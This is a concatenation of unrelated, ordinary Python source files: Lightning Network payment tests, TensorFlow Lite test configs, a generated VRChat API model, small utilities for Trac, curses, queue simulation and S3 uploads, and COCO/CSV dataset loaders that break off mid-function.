out = l2.rpc.call('sendinvoice', {'offer': offer['bolt12'],
'label': 'test sendinvoice 1'})
print(out)
assert out['label'] == 'test sendinvoice 1'
assert out['description'] == 'simple test'
assert 'bolt12' in out
assert 'payment_hash' in out
assert out['status'] == 'paid'
assert 'payment_preimage' in out
assert 'expires_at' in out
assert out['msatoshi'] == 100000000
assert out['amount_msat'] == Millisatoshi(100000000)
assert 'pay_index' in out
assert out['msatoshi_received'] == 100000000
assert out['amount_received_msat'] == Millisatoshi(100000000)
# Note, if we're slow, this fails with "Offer no longer available",
# *but* if it hasn't heard about payment success yet, l2 will fail
# simply because payments are already pending.
with pytest.raises(RpcError, match='Offer no longer available|pay attempt failed'):
l2.rpc.call('sendinvoice', {'offer': offer['bolt12'],
'label': 'test sendinvoice 2'})
# Technically, l1 may not have gotten payment success, so we need to wait.
wait_for(lambda: only_one(l1.rpc.call('listoffers', [offer['offer_id']])['offers'])['used'] is True)
# Now try a refund.
offer = l2.rpc.call('offer', {'amount': '100msat',
'description': 'simple test'})
assert only_one(l2.rpc.call('listoffers', [offer['offer_id']])['offers'])['used'] is False
inv = l1.rpc.call('fetchinvoice', {'offer': offer['bolt12']})
l1.rpc.pay(inv['invoice'])
assert only_one(l2.rpc.call('listoffers', [offer['offer_id']])['offers'])['used'] is True
refund = l2.rpc.call('offerout', {'amount': '100msat',
'description': 'refund test',
'refund_for': inv['invoice']})
assert only_one(l2.rpc.call('listoffers', [refund['offer_id']])['offers'])['used'] is False
l1.rpc.call('sendinvoice', {'offer': refund['bolt12'],
'label': 'test sendinvoice refund'})
wait_for(lambda: only_one(l2.rpc.call('listoffers', [refund['offer_id']])['offers'])['used'] is True)
def test_self_pay(node_factory):
"""Repro test for issue 4345: pay ourselves via the pay plugin.
"""
l1, l2 = node_factory.line_graph(2, wait_for_announce=True)
inv = l1.rpc.invoice(10000, 'test', 'test')['bolt11']
with pytest.raises(RpcError):
l1.rpc.pay(inv)
@unittest.skipIf(TEST_NETWORK != 'regtest', "Canned invoice is network specific")
def test_unreachable_routehint(node_factory, bitcoind):
"""Test that we discard routehints that we can't reach.
Reachability is tested by checking whether we can reach the
entrypoint of the routehint, i.e., the first node in the
routehint. The network we create is partitioned on purpose for
this: first we attempt with an unknown destination and an unknown
routehint entrypoint, later we make them known, but still
unreachable, by connecting them without a channel.
"""
# Create a partitioned network, first without connecting it, then
# connecting it without a channel so they can sync gossip. Notice
# that l4 is there only to trick the deadend heuristic.
l1, l2 = node_factory.line_graph(2, wait_for_announce=True)
l3, l4, l5 = node_factory.line_graph(3, wait_for_announce=True)
entrypoint = '0382ce59ebf18be7d84677c2e35f23294b9992ceca95491fcf8a56c6cb2d9de199'
# Generate an invoice with exactly one routehint.
for i in range(100):
invoice = l5.rpc.invoice(10, 'attempt{}'.format(i), 'description')['bolt11']
decoded = l1.rpc.decodepay(invoice)
if 'routes' in decoded and len(decoded['routes']) == 1:
break
assert('routes' in decoded and len(decoded['routes']) == 1)
with pytest.raises(RpcError, match=r'Destination [a-f0-9]{66} is not reachable'):
l1.rpc.pay(invoice)
l1.daemon.wait_for_log(
r"Removed routehint 0 because entrypoint {entrypoint} is unknown.".format(
entrypoint=entrypoint
)
)
# Now connect l2 to l3 to create a bridge, but without a
# channel. The entrypoint will become known, but still
# unreachable, resulting in a slightly different error message,
# but the routehint will still be removed.
l2.connect(l3)
wait_for(lambda: len(l1.rpc.listnodes(entrypoint)['nodes']) == 1)
with pytest.raises(RpcError, match=r'Destination [a-f0-9]{66} is not reachable') as excinfo:
l1.rpc.pay(invoice)
# Verify that we failed for the correct reason.
l1.daemon.wait_for_log(
r"Removed routehint 0 because entrypoint {entrypoint} is unreachable.".format(
entrypoint=entrypoint
)
)
# Since we aborted once we realized the destination is unreachable
# both directly, and via the routehints we should now just have a
# single attempt.
assert(len(excinfo.value.error['attempts']) == 1)
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test configs for resize_bilinear."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
from tensorflow.lite.testing.zip_test_utils import create_tensor_data
from tensorflow.lite.testing.zip_test_utils import make_zip_of_tests
from tensorflow.lite.testing.zip_test_utils import register_make_test_function
@register_make_test_function()
def make_resize_bilinear_tests(options):
"""Make a set of tests to do resize_bilinear."""
test_parameters = [{
"dtype": [tf.float32, tf.int32],
"input_shape": [[1, 3, 4, 3], [1, 10, 2, 1]],
"size": [[1, 1], [4, 3], [2, 2], [5, 6]],
"align_corners": [None, True, False],
"half_pixel_centers": [False],
"fully_quantize": [False]
}, {
"dtype": [tf.float32],
"input_shape": [[1, 3, 4, 3], [1, 10, 2, 1]],
"size": [[1, 1], [4, 3], [2, 2], [5, 6]],
"align_corners": [None, True, False],
"half_pixel_centers": [False],
"fully_quantize": [True]
}, {
"dtype": [tf.float32],
"input_shape": [[1, 16, 24, 3], [1, 12, 18, 3]],
"size": [[8, 12], [12, 18]],
"align_corners": [None, True, False],
"half_pixel_centers": [False],
"fully_quantize": [True]
}, {
"dtype": [tf.float32],
"input_shape": [[1, 16, 24, 3], [1, 12, 18, 3]],
"size": [[8, 12]],
"align_corners": [None, False],
"half_pixel_centers": [True],
"fully_quantize": [True]
}, {
"dtype": [tf.float32, tf.int32],
"input_shape": [[1, 3, 4, 3], [1, 10, 2, 1]],
"size": [[1, 1], [4, 3], [2, 2], [5, 6]],
"align_corners": [None, False],
"half_pixel_centers": [True],
"fully_quantize": [False]
}]
def build_graph(parameters):
input_tensor = tf.compat.v1.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.compat.v1.image.resize_bilinear(
input_tensor,
size=parameters["size"],
align_corners=parameters["align_corners"],
half_pixel_centers=parameters["half_pixel_centers"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
parameters["dtype"],
parameters["input_shape"],
min_value=-1,
max_value=1)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
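# A minimal, self-contained sketch (not part of the generated test set) of the
# op these configs exercise: tf.compat.v1.image.resize_bilinear applied to a
# 1x3x4x3 input resized to 2x2, mirroring the first parameter combination
# above. The helper name is ours; call it manually to eyeball the output shape.
def _resize_bilinear_demo():
  import numpy as np
  with tf.Graph().as_default():
    inp = tf.placeholder(dtype=tf.float32, shape=[1, 3, 4, 3], name="demo_in")
    out = tf.compat.v1.image.resize_bilinear(
        inp, size=[2, 2], align_corners=False, half_pixel_centers=False)
    with tf.Session() as sess:
      data = np.random.uniform(-1, 1, size=(1, 3, 4, 3)).astype(np.float32)
      result = sess.run(out, feed_dict={inp: data})
  return result.shape  # expected: (1, 2, 2, 3)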
|
"""
VRChat API Documentation
The version of the OpenAPI document: 1.6.8
Contact: me@ruby.js.org
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from vrchatapi.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
from ..model_utils import OpenApiModel
from vrchatapi.exceptions import ApiAttributeError
class PlayerModerationID(ModelSimple):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
          and for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
validations (dict): The key is the tuple path to the attribute
          and for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
('value',): {
'regex': {
'pattern': r'', # noqa: E501
},
},
}
additional_properties_type = None
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
'value': (str,),
}
@cached_property
def discriminator():
return None
attribute_map = {}
read_only_vars = set()
_composed_schemas = None
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs):
"""PlayerModerationID - a model defined in OpenAPI
Note that value can be passed either in args or in kwargs, but not in both.
Args:
args[0] (str): # noqa: E501
Keyword Args:
value (str): # noqa: E501
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
                              composed schema that is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
# required up here when default value is not given
_path_to_item = kwargs.pop('_path_to_item', ())
if 'value' in kwargs:
value = kwargs.pop('value')
elif args:
args = list(args)
value = args.pop(0)
else:
raise ApiTypeError(
"value is required, but not passed in args or kwargs and doesn't have default",
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.value = value
if kwargs:
raise ApiTypeError(
"Invalid named arguments=%s passed to %s. Remove those invalid named arguments." % (
kwargs,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs):
"""PlayerModerationID - a model defined in OpenAPI
Note that value can be passed either in args or in kwargs, but not in both.
Args:
args[0] (str): # noqa: E501
Keyword Args:
value (str): # noqa: E501
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
                              composed schema that is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
# required up here when default value is not given
_path_to_item = kwargs.pop('_path_to_item', ())
self = super(OpenApiModel, cls).__new__(cls)
if 'value' in kwargs:
value = kwargs.pop('value')
elif args:
args = list(args)
value = args.pop(0)
else:
raise ApiTypeError(
"value is required, but not passed in args or kwargs and doesn't have default",
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.value = value
if kwargs:
raise ApiTypeError(
"Invalid named arguments=%s passed to %s. Remove those invalid named arguments." % (
kwargs,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
return self
|
x = "python"
print(x.startswith("P"))
print(x.startswith("p")) # Return True if x starts with the specified prefix, False otherwise
print(x.endswith("P")) # Return True if x ends with the specified suffix, False otherwise
print(x.endswith('n'))
print(x.islower()) # Return True if the string is a lowercase string, False otherwise
print(x.istitle()) # Return True if the string is a title-cased string, False otherwise
print(x.isspace()) # Return True if the string is a whitespace string, False otherwise
print(x.isalpha()) # Return True if the string is an alphabetic string, False otherwise
print(x.isnumeric()) # Return True if the string is a numeric string, False otherwise
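# A few more predicates from the same family (added here for contrast):
print(x.isupper())           # False: "python" contains no uppercase letters
print(x.isalnum())           # True: alphabetic characters count as alphanumeric
print("3.14".isnumeric())    # False: the decimal point is not a numeric character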
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2014-2019 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.com/license.html.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/.
from trac.util import backup_config_file
def do_upgrade(env, version, cursor):
"""Move definition of default repository from [trac] repository_dir to
[repositories] section.
"""
backup_config_file(env, '.db31.bak')
repository_dir = env.config.get('trac', 'repository_dir')
if repository_dir:
if not env.config.get('repositories', '.dir') and \
not env.config.get('repositories', '.alias'):
env.config.set('repositories', '.dir', repository_dir)
env.log.info("Moved configuration options for default repository "
"to [repositories] section of trac.ini")
else:
env.log.info("[trac] repository_dir = %s discarded from "
"configuration because [repositories] "
"'.dir' or '.alias' already exists.", repository_dir)
env.config.remove('trac', 'repository_dir')
env.config.save()
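# Illustrative only: the trac.ini change performed by do_upgrade(), shown with a
# made-up repository path.
#
#   Before:                               After:
#   [trac]                                [repositories]
#   repository_dir = /srv/svn/project     .dir = /srv/svn/project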
|
import curses
if __name__ == "__main__":
print("Ejecutar el archivo main.py")
height, width = 1, 1
def set_size(stdscr):
global height, width
height, width = stdscr.getmaxyx()
def center_print(stdscr, text, y):
global height, width
t_len = len(text)
x = width // 2 - t_len // 2
stdscr.addstr(y, x, text)
stdscr.refresh()
def show_menu(stdscr, selected_row_idx, options):
h, w = stdscr.getmaxyx()
for idx, row in enumerate(options):
x = w//2 - len(row)//2
y = h//2 - len(options)//2 + idx
if row == "Salir" or row == "Volver al menú":
y += 1
if idx == selected_row_idx:
stdscr.attron(curses.color_pair(1))
stdscr.addstr(y, x, row)
stdscr.attroff(curses.color_pair(1))
else:
stdscr.addstr(y, x, row)
stdscr.refresh()
def arrow_moves(stdscr, current_row, options, decrement, increment):
key = stdscr.getch()
if key == decrement and current_row > 0:
current_row -= 1
elif key == increment and current_row < len(options)-1:
current_row += 1
elif key == curses.KEY_ENTER or key in [10, 13]:
return True, current_row
return False, current_row
def menu_displayer(stdscr, options, title, current_option):
h, w = height, width
stdscr.clear()
while True:
center_print(stdscr, title.upper(), h//2 - len(options))
show_menu(stdscr, current_option, options)
is_selected, current_option = arrow_moves(stdscr, current_option, options,
curses.KEY_UP, curses.KEY_DOWN)
show_menu(stdscr, current_option, options)
if is_selected:
return current_option
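# A minimal, hypothetical driver (not part of main.py) showing how the helpers
# above could be wired together. It initialises colour pair 1 explicitly, since
# show_menu() relies on curses.color_pair(1) to highlight the selected row.
def _demo(stdscr):
    curses.curs_set(0)
    curses.start_color()
    curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_WHITE)
    set_size(stdscr)
    options = ["Opcion A", "Opcion B", "Salir"]
    choice = menu_displayer(stdscr, options, "menu principal", 0)
    stdscr.clear()
    center_print(stdscr, "Seleccion: " + options[choice], height // 2)
    stdscr.getch()
# curses.wrapper(_demo)  # uncomment to run the demo in a real terminal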
|
""" Functions for moving clusters experiment. """
import itertools as it
import sys
import ciw
import dask
import numpy as np
import pandas as pd
import tqdm
from ciw.dists import Exponential
from dask.diagnostics import ProgressBar
from util import (
COPD,
DATA_DIR,
MAX_TIME,
NUM_SERVERS,
PROPS,
ShiftedExponential,
get_queue_params,
get_results,
)
OUT_DIR = DATA_DIR / "moving_clusters/"
OUT_DIR.mkdir(exist_ok=True)
NUM_CORES = int(sys.argv[1])
NUM_SEEDS = int(sys.argv[2])
MOVE_GRANULARITY = float(sys.argv[3])
PROP_TO_MOVE_RANGE = np.arange(0, 1, MOVE_GRANULARITY).round(2)
n_clusters = COPD["cluster"].nunique()
def get_combinations():
return (
labels
for labels in it.product(range(n_clusters), repeat=2)
if labels[0] != labels[1]
)
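# For example, with n_clusters == 3 the generator above yields the ordered
# pairs (0, 1), (0, 2), (1, 0), (1, 2), (2, 0) and (2, 1).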
def get_params():
return it.product(get_combinations(), PROP_TO_MOVE_RANGE, range(NUM_SEEDS))
def update_arrival_params(all_queue_params, origin, destination, prop_to_move):
origin_lambda = all_queue_params[origin]["arrival"]
destination_lambda = all_queue_params[destination]["arrival"]
destination_lambda += prop_to_move * origin_lambda
origin_lambda *= 1 - prop_to_move
all_queue_params[origin]["arrival"] = origin_lambda
all_queue_params[destination]["arrival"] = destination_lambda
return all_queue_params
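# Worked example of the shift above (made-up rates): with prop_to_move = 0.25,
# an origin arrival rate of 2.0 and a destination rate of 1.0 become
# destination = 1.0 + 0.25 * 2.0 = 1.5 and origin = 2.0 * (1 - 0.25) = 1.5.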
@dask.delayed
def simulate_queue(
data, props, num_servers, origin, destination, prop_to_move, seed, max_time
):
""" Build and simulate a queue under the provided parameters. """
ciw.seed(seed)
all_queue_params = {}
for label, prop in zip(range(n_clusters), props):
cluster = data[data["cluster"] == label]
all_queue_params[label] = get_queue_params(cluster, prop)
all_queue_params = update_arrival_params(
all_queue_params, origin, destination, prop_to_move
)
N = ciw.create_network(
arrival_distributions={
f"Class {label}": [Exponential(params["arrival"])]
for label, params in all_queue_params.items()
},
service_distributions={
f"Class {label}": [ShiftedExponential(*params["service"])]
for label, params in all_queue_params.items()
},
number_of_servers=[num_servers],
)
Q = ciw.Simulation(N)
Q.simulate_until_max_time(max_time)
return Q
def main():
tasks = (
simulate_queue(
COPD,
PROPS,
NUM_SERVERS,
origin,
destination,
prop_to_move,
seed,
MAX_TIME,
)
for (origin, destination), prop_to_move, seed in get_params()
)
with ProgressBar():
queues = dask.compute(
*tasks, scheduler="processes", num_workers=NUM_CORES
)
util_dfs, time_dfs = [], []
for ((orgn, dest), move, seed), queue in tqdm.tqdm(
zip(get_params(), queues)
):
utilisations, system_times = get_results(
queue,
MAX_TIME,
origin=orgn,
destination=dest,
prop_to_move=move,
seed=seed,
)
util_dfs.append(utilisations)
time_dfs.append(system_times)
utilisations = pd.concat(util_dfs)
system_times = pd.concat(time_dfs)
utilisations.to_csv(OUT_DIR / "utilisations.csv", index=False)
system_times.to_csv(OUT_DIR / "system_times.csv", index=False)
if __name__ == "__main__":
main()
|
#!/usr/bin/env python3
# coding=utf-8
"""A utility to write a raw vendor/data files to AWS S3.
To use this utility you will need to ensure that your AWS credentials
are available via expected environment variables. Please refer to
the AWS boto3 documentation, which describes this: -
https://boto3.amazonaws.com/v1/documentation/api/latest/guide/quickstart.html
Alan Christie
February 2019
"""
import argparse
import logging
import os
import sys
import boto3
# Configure basic logging
formatter = logging.Formatter('%(asctime)s %(levelname)s # %(message)s',
'%Y-%m-%dT%H:%M:%S')
out_hdlr = logging.StreamHandler()
out_hdlr.setFormatter(formatter)
out_hdlr.setLevel(logging.INFO)
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
logger.addHandler(out_hdlr)
# Expected environment variables (that define the bucket)
s3_bucket_env = 'AWS_S3_BUCKET'
s3_raw_root = 'raw'
s3_archive_bucket = os.environ.get(s3_bucket_env)
if not s3_archive_bucket:
logger.error('You must define %s', s3_bucket_env)
sys.exit(1)
parser = argparse.ArgumentParser('Graph Raw File Putter')
parser.add_argument('source', metavar='DIR', type=str,
help='The local directory (where the raw data exists)')
parser.add_argument('prefix', metavar='PREFIX', type=str,
help='The file prefix'
' (only files with this prefix will be written)')
parser.add_argument('path', metavar='PATH', type=str,
help='The path, relative to the "raw" directory'
' in your S3 bucket. e.g. "activity/senp7"')
args = parser.parse_args()
# Check source directory
if not os.path.isdir(args.source):
logger.error('The source directory does not exist (%s)', args.source)
sys.exit(1)
# The S3 raw path...
dst = s3_raw_root + '/' + args.path + '/'
s3_client = boto3.client('s3')
# We must not write to an existing path (key).
# It is up to the user to make sure the destination does not exist;
# it is too easy to overwrite files in S3.
target = s3_client.list_objects_v2(Bucket=s3_archive_bucket,
Prefix=dst)
if 'KeyCount' in target and target['KeyCount']:
logger.error('The raw path already exists in S3.'
' You cannot "put" to existing locations.')
sys.exit(1)
# Upload the list of files...
potential_files = os.listdir(args.source)
for potential_file in potential_files:
src = os.path.join(args.source, potential_file)
if os.path.isfile(src) and potential_file.startswith(args.prefix):
dst = s3_raw_root + '/' + args.path + '/' + potential_file
logger.info('Putting %s -> %s...', potential_file, args.path)
s3_client.upload_file(src, s3_archive_bucket, dst)
|
from __future__ import print_function, division
import sys
import os
import torch
import numpy as np
import random
import csv
from six import raise_from  # used below to re-raise CSV parsing errors with context
from torch.utils.data import Dataset, DataLoader
from torchvision import transforms, utils
from torch.utils.data.sampler import Sampler
from pycocotools.coco import COCO
import skimage.io
import skimage.transform
import skimage.color
import skimage
from PIL import Image
class CocoDataset(Dataset):
"""Coco dataset."""
def __init__(self, root_dir, set_name='train2017', transform=None):
"""
        Args:
            root_dir (string): COCO directory.
            set_name (string, optional): dataset split to load, e.g. 'train2017'.
            transform (callable, optional): Optional transform to be applied
                on a sample.
"""
self.root_dir = root_dir
self.set_name = set_name
self.transform = transform
self.coco = COCO(os.path.join(self.root_dir, 'annotations', 'instances_' + self.set_name + '.json'))
self.image_ids = self.coco.getImgIds()
self.load_classes()
def load_classes(self):
# load class names (name -> label)
categories = self.coco.loadCats(self.coco.getCatIds())
categories.sort(key=lambda x: x['id'])
self.classes = {}
self.coco_labels = {}
self.coco_labels_inverse = {}
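        # map COCO's non-contiguous category ids to contiguous labels 0..N-1 (and back)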
for c in categories:
self.coco_labels[len(self.classes)] = c['id']
self.coco_labels_inverse[c['id']] = len(self.classes)
self.classes[c['name']] = len(self.classes)
# also load the reverse (label -> name)
self.labels = {}
for key, value in self.classes.items():
self.labels[value] = key
def __len__(self):
return len(self.image_ids)
def __getitem__(self, idx):
img = self.load_image(idx)
annot = self.load_annotations(idx)
sample = {'img': img, 'annot': annot}
if self.transform:
sample = self.transform(sample)
return sample
def load_image(self, image_index):
image_info = self.coco.loadImgs(self.image_ids[image_index])[0]
path = os.path.join(self.root_dir, self.set_name, image_info['file_name'])
img = skimage.io.imread(path)
if len(img.shape) == 2:
img = skimage.color.gray2rgb(img)
return img.astype(np.float32)/255.0
def load_annotations(self, image_index):
# get ground truth annotations
annotations_ids = self.coco.getAnnIds(imgIds=self.image_ids[image_index], iscrowd=False)
annotations = np.zeros((0, 5))
# some images appear to miss annotations (like image with id 257034)
if len(annotations_ids) == 0:
return annotations
# parse annotations
coco_annotations = self.coco.loadAnns(annotations_ids)
for idx, a in enumerate(coco_annotations):
# some annotations have basically no width / height, skip them
if a['bbox'][2] < 1 or a['bbox'][3] < 1:
continue
annotation = np.zeros((1, 5))
annotation[0, :4] = a['bbox']
annotation[0, 4] = self.coco_label_to_label(a['category_id'])
annotations = np.append(annotations, annotation, axis=0)
# transform from [x, y, w, h] to [x1, y1, x2, y2]
annotations[:, 2] = annotations[:, 0] + annotations[:, 2]
annotations[:, 3] = annotations[:, 1] + annotations[:, 3]
return annotations
def coco_label_to_label(self, coco_label):
return self.coco_labels_inverse[coco_label]
def label_to_coco_label(self, label):
return self.coco_labels[label]
def image_aspect_ratio(self, image_index):
image = self.coco.loadImgs(self.image_ids[image_index])[0]
return float(image['width']) / float(image['height'])
def num_classes(self):
return 80
class CSVDataset(Dataset):
"""CSV dataset."""
def __init__(self, train_file, class_list, transform=None):
"""
Args:
            train_file (string): CSV file with training annotations.
            class_list (string): CSV file with the class list (class_name,class_id).
            transform (callable, optional): Optional transform to be applied
                on a sample.
"""
self.train_file = train_file
self.class_list = class_list
self.transform = transform
# parse the provided class file
try:
with self._open_for_csv(self.class_list) as file:
self.classes = self.load_classes(csv.reader(file, delimiter=','))
except ValueError as e:
raise_from(ValueError('invalid CSV class file: {}: {}'.format(self.class_list, e)), None)
self.labels = {}
for key, value in self.classes.items():
self.labels[value] = key
# csv with img_path, x1, y1, x2, y2, class_name
try:
with self._open_for_csv(self.train_file) as file:
self.image_data = self._read_annotations(csv.reader(file, delimiter=','), self.classes)
except ValueError as e:
raise_from(ValueError('invalid CSV annotations file: {}: {}'.format(self.train_file, e)), None)
self.image_names = list(self.image_data.keys())
def _parse(self, value, function, fmt):
"""
Parse a string into a value, and format a nice ValueError if it fails.
Returns `function(value)`.
        Any `ValueError` raised is caught and a new `ValueError` is raised
        with message `fmt.format(e)`, where `e` is the caught `ValueError`.
"""
try:
return function(value)
except ValueError as e:
raise_from(ValueError(fmt.format(e)), None)
def _open_for_csv(self, path):
"""
Open a file with flags suitable for csv.reader.
        On Python 2 this means opening with mode 'rb';
        on Python 3 it means mode 'r' with newline='' ("universal newlines").
"""
if sys.version_info[0] < 3:
return open(path, 'rb')
else:
return open(path, 'r', newline='')
def load_classes(self, csv_reader):
result = {}
for line, row in enumerate(csv_reader):
line += 1
try:
class_name, class_id = row
except ValueError:
raise_from(ValueError('line {}: format should be \'class_name,class_id\''.format(line)), None)
class_id = self._parse(class_id, int, 'line {}: malformed class ID: {{}}'.format(line))
if class_name in result:
raise ValueError('line {}: duplicate class name: \'{}\''.format(line, class_name))
result[class_name] = class_id
return result
def __len__(self):
return len(self.image_names)
def __getitem__(self, idx):
img = self.load_image(idx)
annot = self.load_annotations(idx)
sample = {'img': img, 'annot': annot}
if self.transform:
sample = self.transform(sample)
return sample
def load_image(self, image_index):
img = skimage.io.imread(self.image_names[image_index])
if len(img.shape) == 2:
img = skimage.color.gray2rgb(img)
return img.astype(np.float32)/255.0
def load_annotations(self, image_index):
# get ground truth annotations
annotation_list = self.image_data[self.image_names[image_index]]
annotations = np.zeros((0, 5))
        # some images may have no annotations at all
if len(annotation_list) == 0:
return annotations
# parse annotations
for idx, a in enumerate(annotation_list):
# some annotations have basically no width / height, skip them
x1 = a['x1']
x2 = a['x2']
y1 = a['y1']
y2 = a['y2']
if (x2-x1) < 1 or (y2-y1) < 1:
continue
annotation = np.zeros((1, 5))
annotation[0, 0] = x1
annotation[0, 1] = y1
annotation[0, 2] = x2
annotation[0, 3] = y2
annotation[0, 4] = self.name_to_label(a['class'])
annotations = np.append(annotations, annotation, axis=0)
return annotations
def _read_annotations(self, csv_reader, classes):
result = {}
for line, row in enumerate(csv_reader):
line += 1
try:
img_file, x1, y1, x2, y2, class_name = row[:6]
except ValueError:
raise_from(ValueError('line {}: format should be \'img_file,x1,y1,x2,y2,class_name\' or \'img_file,,,,,\''.format(line)), None)
if img_file not in result:
result[img_file] = []
# If a row contains only an image path, it's an image without annotations.
if (x1, y1, x2, y2, class_name) == ('', '', '', '', ''):
continue
x1 = self._parse(x1, int, 'line {}: malformed x1: {{}}'.format(line))
y1 = self._parse(y1, int, 'line {}: malformed y1: {{}}'.format(line))
x2 = self._parse(x2, int, 'line {}: malformed x2: {{}}'.format(line))
y2 = self._parse(y2, int, 'line {}: malformed y2: {{}}'.format(line))
# Check that the bounding box is valid.
if x2 <= x1:
raise ValueError('line {}: x2 ({}) must be higher than x1 ({})'.format(line, x2, x1))
if y2 <= y1:
raise ValueError('line {}: y2 ({}) must be higher than y1 ({})'.format(line, y2, y1))
# check if the current class name is correctly present
if class_name not in classes:
raise ValueError('line {}: unknown class name: \'{}\' (classes: {})'.format(line, class_name, classes))
result[img_file].append({'x1': x1, 'x2': x2, 'y1': y1, 'y2': y2, 'class': class_name})
return result
def name_to_label(self, name):
return self.classes[name]
def label_to_name(self, label):
return self.labels[label]
def num_classes(self):
return max(self.classes.values()) + 1
def image_aspect_ratio(self, image_index):
image = Image.open(self.image_names[image_index])
return float(image.width) / float(image.height)
def collater(data):
imgs = [s['img'] for s in data]
annots = [s['annot'] for s in data]
scales = [s['scale'] for s in data]
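    # note: imgs are (rows, cols, channels) tensors, so s.shape[0] is really the
    # image height; the widths/heights names below are swapped but used consistently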
widths = [int(s.shape[0]) for s in imgs]
heights = [int(s.shape[1]) for s in imgs]
batch_size = len(imgs)
max_width = np.array(widths).max()
max_height = np.array(heights).max()
padded_imgs = torch.zeros(batch_size, max_width, max_height, 3)
